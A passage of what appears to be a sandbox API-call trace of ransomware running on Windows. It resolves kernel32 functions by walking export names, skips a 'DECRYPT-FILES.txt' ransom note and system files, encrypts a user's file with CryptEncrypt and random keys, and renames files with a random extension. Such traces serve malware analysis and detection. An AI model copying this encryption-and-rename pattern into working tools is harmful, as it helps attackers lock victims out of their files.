lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.274] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.274] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.275] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.275] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.275] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.275] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.275] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.275] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.275] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.275] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.275] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.275] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.275] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.275] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.275] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.275] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.275] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.275] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.275] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.275] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.275] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.275] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.275] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.275] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\skBGg8NuGv.pptx") returned 90 [0083.275] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\skBGg8NuGv.pptx.a9ThA7o") returned 98 [0083.275] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\skBGg8NuGv.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\skbgg8nugv.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\skBGg8NuGv.pptx.a9ThA7o" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\skbgg8nugv.pptx.a9tha7o"), dwFlags=0x0) returned 1 [0083.276] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.276] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.276] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.277] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x419c4550, ftCreationTime.dwHighDateTime=0x1d4c546, ftLastAccessTime.dwLowDateTime=0x90cd45d0, ftLastAccessTime.dwHighDateTime=0x1d4c667, ftLastWriteTime.dwLowDateTime=0x90cd45d0, ftLastWriteTime.dwHighDateTime=0x1d4c667, nFileSizeHigh=0x0, nFileSizeLow=0xaae5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sy-Ep.mkv", cAlternateFileName="")) returned 1 [0083.277] lstrcmpiW (lpString1="Sy-Ep.mkv", lpString2="DECRYPT-FILES.txt") returned 1 [0083.277] lstrcmpiW (lpString1="Sy-Ep.mkv", lpString2="autorun.inf") returned 1 [0083.277] lstrcmpiW (lpString1="Sy-Ep.mkv", lpString2="boot.ini") returned 1 [0083.277] lstrcmpiW (lpString1="Sy-Ep.mkv", lpString2="desktop.ini") returned 1 [0083.277] lstrcmpiW (lpString1="Sy-Ep.mkv", lpString2="ntuser.dat") returned 1 [0083.277] lstrcmpiW (lpString1="Sy-Ep.mkv", lpString2="iconcache.db") returned 1 [0083.277] lstrcmpiW (lpString1="Sy-Ep.mkv", lpString2="bootsect.bak") returned 1 [0083.277] lstrcmpiW (lpString1="Sy-Ep.mkv", lpString2="ntuser.dat.log") returned 1 [0083.277] lstrcmpiW (lpString1="Sy-Ep.mkv", lpString2="thumbs.db") returned -1 [0083.277] lstrcmpiW (lpString1="Sy-Ep.mkv", lpString2="Bootfont.bin") returned 1 [0083.277] lstrlenW (lpString="Sy-Ep.mkv") returned 9 [0083.277] lstrcmpiW (lpString1="mkv", lpString2="lnk") returned 1 [0083.277] lstrcmpiW (lpString1="mkv", lpString2="exe") returned 1 [0083.277] lstrcmpiW (lpString1="mkv", lpString2="sys") returned -1 [0083.277] lstrcmpiW (lpString1="mkv", lpString2="dll") returned 1 [0083.277] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned 75 [0083.277] lstrlenW (lpString="Sy-Ep.mkv") returned 9 [0083.277] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" [0083.277] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpString2="Sy-Ep.mkv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\Sy-Ep.mkv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\Sy-Ep.mkv" [0083.277] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.277] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\Sy-Ep.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\sy-ep.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0083.278] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=43749) returned 1 [0083.278] CreateFileMappingW (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x454 [0083.278] MapViewOfFile (hFileMappingObject=0x454, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0083.278] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.278] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.278] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.278] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0083.278] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0083.279] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.279] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0083.280] CloseHandle (hObject=0x454) returned 1 [0083.280] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.280] WriteFile (in: hFile=0x450, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0083.281] CloseHandle (hObject=0x0) returned 0 [0083.281] CloseHandle (hObject=0x450) returned 1 [0083.281] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.281] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.281] GetTickCount () returned 0x114d49e [0083.281] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.282] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.282] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.282] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.282] lstrlenA (lpString="kernel32.dll") returned 12 [0083.282] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.282] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.282] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.283] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.283] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.283] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.283] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.283] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.283] lstrlenA (lpString="ADDATOMA") returned 8 [0083.283] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.283] lstrlenA (lpString="ADDATOMW") returned 8 [0083.283] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.283] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.283] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.283] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.283] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.283] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.283] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.283] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.283] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.283] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.283] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.283] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.283] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.283] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.283] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.283] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.283] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.283] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.283] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.283] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.283] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.283] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.283] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.283] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.283] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.283] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.283] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.283] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.283] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.284] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.284] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.284] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.284] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.284] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.284] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.284] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.284] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.284] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.284] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.284] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.284] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.284] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.284] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.284] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.284] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.284] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.284] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.284] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.284] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.284] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.284] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.284] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.284] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.284] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.284] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.284] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.284] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.284] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.284] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.284] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.284] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.284] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.284] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.284] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.284] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.285] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.285] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.285] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.285] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.285] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.285] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.285] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.285] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.285] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.285] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.285] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.285] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.285] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.285] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.285] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.285] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.285] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.285] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.285] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.285] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.285] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.285] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.285] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.285] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.285] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.285] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.285] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.285] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.285] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.285] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.285] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.285] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.285] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.285] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.285] lstrlenA (lpString="BEEP") returned 4 [0083.286] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.286] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.286] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.286] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.286] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.286] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.286] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.286] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.286] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.286] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.286] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.286] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.286] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.286] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.286] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.286] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.286] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.286] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.286] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.286] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.286] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.286] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.286] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.286] lstrlenA (lpString="CANCELIO") returned 8 [0083.286] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.286] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.286] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.286] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.286] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.286] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.286] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.286] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.286] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: 